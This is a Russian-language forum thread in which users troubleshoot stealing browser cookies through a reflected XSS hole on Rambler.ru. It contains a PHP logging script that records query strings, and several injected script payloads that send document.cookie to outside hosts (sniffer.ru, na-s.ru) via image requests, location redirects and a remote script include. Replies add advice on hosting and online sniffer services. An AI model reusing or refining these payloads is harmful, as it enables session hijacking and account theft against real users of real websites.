Отправка cookies на сниффер?
 

Доброго времени суток. Прошу помочь советом? Я использую браузер Mozilla Firefox. Так вот проблема в том что я не могу отправить куки на сниффер. Начну попорядку.

1. У меня есть свой хост с поддержкой PHP но без поддержки .htaccess. Это: http://www.wallst.ru. На него я залил свой скрипт. Вот исходный код:
<?php

$log="log.txt";
$file=fopen($log,"a+");

$RZ="_";
$Date=date("d:m:Y");
$Time=date("H:i");
$IP=$_SERVER['REMOTE_ADDR'];
$QS=$_SERVER['QUERY_STRING'];
fputs($file,$Date.$RZ.$Time.$RZ.$IP.$RZ.$QS."\n");
fclose($file);
?>
Скрипт в формате php так как htaccess не поддерживается. Права на файл сниффера и на текстовый файл log.txt я выставил 777.

2. Захотел проверить работу сниффера... Нашел пассивную XSS уязвимость в Рамблер.ру. Пишу запрос в строку браузера на вывод моих cookies через функцию alert().
http://........./.........?="><script>alert(document .cookie)</script>. Выводятся мои плюшки...:). Все нормульки. Но если написать запрос на отправку кук на мой сниффер, то на него абсолютно ничего не приходит, запрос пишу вод так:
http://........./.........?=<script>img = new Image(); img.src ="http://sniffer.ru/sniffer.php?"+document.cookie;</script>
Тоесть я предпологаю что все что находится после "?"
будет отправлено в QUERY_STRING(так должно быть).
Пробывал и так:
http://........./.........?=<script>document.location.replace('http :sniffer.ru
sniffer.php?'+document.cookie);</script>, тоже ничего.

Огромная просьба исравить что не так. Может код сниффера, может запрос, я не могу понять, уже всю голову изломал. Удалил нафиг фаервол, антивирь, все что связано с защитой, пробовал реалезовать в Опере тоже самое. Прозьба дать дельный совет...

Вобще валлст хоть русский,но не советую его
Попробуй на freehostia.com

я пользовался таким сниффером.
три файла

log.php
содержимое

js.js
содержимое
base.php - файл базы

Вставка сниффера
http://........./.........?"><script src="http://sniffer.ru/js.js"></script>

Не парся,и юзай online-sniffer.ru

satana-fu, попробую использовать такой... но не думаю что беда в снифаке, я немогу понять почему они не отправляются..
Батхед - мне бы беспланый хостинг с php и htaccess, но я думая что такового не существует в сущности....:).
попробывал он-лайн сниффер.
даю такой запрос но ничего не приходит......:((
http://rambler.ru?c=<script>img = new Image(); img.src = "http://na-s.ru/images/888888_1.gif?"+document.cookie;</script>.
Почему? Как через Оперу так и через Мозиллу....... Помогите?...:(

скинь в личку ссыль с ксс, попробую разобраться

Главное время запроса и ip с рефером на на мой личный сниффер приходят вод так:
22:11:2009_14:37_а.й.п.и_....(айпи скрыл), а вот куки нет.....
Подскажите в чем трабла, плиз..

satana-fu, с твои скриптом хоть что-то стало работать, теперь куки выводятся мне в адресную строку браузера, что делать?

тогда уж делай так чтоле http://rambler.ru?"><script>img = new Image(); img.src = "http://na-s.ru/images/888888_1.gif?"+document.cookie;</script>

ReduKToR, ни так ни так, не катит....

если кукисы выводятся в адресную строку, то скорее всего у тебя на сервере проблема, а не в самом сниффере, обычно такая трабла у меня наблюдалась когда я тестил сниффер на фрихостии, ничего в файл не записывалось, и скрипт пытался кукисы передать get запросом. меняй сервак....

satana-fu, понял, у меня тоже все вывелось по твоей ссылке, :). Наверное только в этом проблема. Попытаюсь найти нормальный хост. Подскажите если можно русский нормальный хостинг с поддрежкой php, если можно с регистрацией без отправки письма на мыло....

свершилось аказывается на моем хостинге запрещена функция на php для внешних ссылок, fopen(), наверное в этом трабла...

Да нет трабла не в этом, пишу значит так:
http://mysniffer.ru/sniffer.php?1111,
мне 1111 приходят на снифер, а вот что с запросом, не наю.
Млин уже и через img() запрос писал и через докьюмент_локатион, и ничего.......
Может есть еще способы чтобы както запрос дать на отправку кук на снифак?:(((((